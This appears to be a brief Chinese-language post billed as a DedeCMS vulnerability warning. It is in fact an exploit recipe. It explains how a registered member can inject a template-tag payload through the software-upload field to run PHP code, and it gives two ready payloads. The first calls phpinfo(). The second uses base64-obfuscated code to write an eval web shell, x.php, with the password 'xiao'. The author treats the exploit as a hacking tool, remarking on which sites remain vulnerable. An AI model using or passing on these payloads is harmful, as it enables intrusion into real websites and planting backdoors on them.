dedecms最新漏洞漏洞預(yù)警 -電腦資料

    說下利用方法：注冊會員，上傳軟件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，發(fā)表后查看或修改即可執(zhí)行，

dedecms最新漏洞漏洞預(yù)警

    生成的解析文件內(nèi)容如下：

    成功之后的效果

    這漏洞雞肋之處在于經(jīng)歷上次的0day沖擊后，很多站點(diǎn)已經(jīng)關(guān)閉了會員功能或者直接刪除了member目錄，并且沒有多少站會有軟件欄目的，嗯 ，所以搞搞 下載站之類的差不多了 所以比較悲哀吧，哈哈，

電腦資料

    a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

    生成x.php 密碼：xiao直接生成一句話。密碼xiao 大家懂得。不了解自己解密去。。。